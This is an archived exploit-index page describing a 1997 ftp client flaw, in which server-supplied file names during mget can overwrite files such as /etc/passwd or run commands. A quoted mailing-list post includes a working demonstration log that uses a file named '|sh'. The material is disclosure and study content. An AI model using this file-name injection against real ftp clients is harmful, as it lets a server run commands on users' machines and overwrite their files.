Nmap logo

ftp mget vulnerability

Description:If the nlist caused by a mget returns a file like /etc/passwd , most ftp clients seem to (try to) overwrite/create it without signaling anything wrong. You can also use files with names like "|sh" to execute arbitrary commands.
Author:I don't recall who found it first, in the appended post af@c4c.com gives an example of the bug using Linus slackware
Compromise:ftp servers can compromise clients who use mget to d/l files
Vulnerable Systems:ftp clients on Linux, AIX, HP/UX, Solaris 2.6, and probably many other systems
Date:3 November 1997 was when this example was posted (the bug was found a while back)

Date: Mon, 3 Nov 1997 10:03:52 -0700
From: af@C4C.COM
Subject: Re: IBM-ERS Security Vulnerability Alert: The AIX ftp client              interprets server provided filenames

> ers@VNET.IBM.COM wrote:
> > VULNERABILITY:    The AIX ftp client interprets server provided
> > filenames
> > I.  Description
> > The ftp client can be tricked into running arbitrary commands supplied
> > by the
> > remote server.  When the remote file begins with a pipe symbol, the
> > ftp client
> > will process the contents of the remote file as a shell script.
> On two machines running AIX 3.2.5 I've tested it, but instead of
> executing the remote file, it searches for a local file with the same
> name as the remote file and executes it with normal user priviledges
> instead of root privilegdes.

Yes, but try "|sh" instead.  I've included a log of what happens.
> BTW, I believe that this also happens on HP-UX 9.05

It works on our Linux slackware as well.  I suspect most ftp
clients are susceptible to this "problem."

$ id
uid=100(guest) gid=100(usr)
$ pwd
$ echo "id > /tmp/OUT" > "|sh"
$ ls -la
total 24
drwxr-xr-x   2 guest    usr          512 Nov  3 09:45 .
drwxrwxrwt   6 bin      bin         1024 Nov  3 09:44 ..
-rw-r--r--   1 guest    usr           14 Nov  3 09:45 |sh
$ ftp localhost
Connected to localhost.
230 User guest logged in.
ftp> cd /tmp/ftp-test
ftp> ls -l
total 24
-rw-r--r--   1 guest    usr           14 Nov  3 09:45 |sh
ftp> mget *
mget |sh? y
150 Opening data connection for |sh (14 bytes).
15 bytes received in 0.2187 seconds (0.06699 Kbytes/s)
local: |sh remote: |sh
ftp> quit
$ ls -l /tmp/OUT
-rw-r--r--   1 guest    usr           28 Nov  3 09:45 /tmp/OUT
$ cat /tmp/OUT
uid=100(guest) gid=100(usr)

I also wonder about IBM's answer:

SOLUTION:         Remove the setuid bit from the "ftp" command.

On our 4.2.1, ftp will not run if it is not suid.
Didn't somebody test this?

Andrew Green

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]